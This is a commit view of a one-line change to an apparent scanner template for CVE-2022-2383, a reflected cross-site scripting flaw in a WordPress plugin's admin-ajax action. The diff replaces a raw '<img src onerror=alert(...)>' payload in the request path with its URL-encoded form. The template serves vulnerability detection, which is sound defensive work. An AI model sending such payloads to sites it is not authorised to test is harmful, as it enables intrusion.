Update CVE-2022-2383.yaml

patch-1
Ritik Chaddha 2022-08-25 21:23:08 +05:30 committed by GitHub
parent b1c9ed03d7
commit 34a1d28213
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -18,7 +18,7 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=<img src onerror=alert(document.domain)>'
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E'
matchers-condition: and
matchers: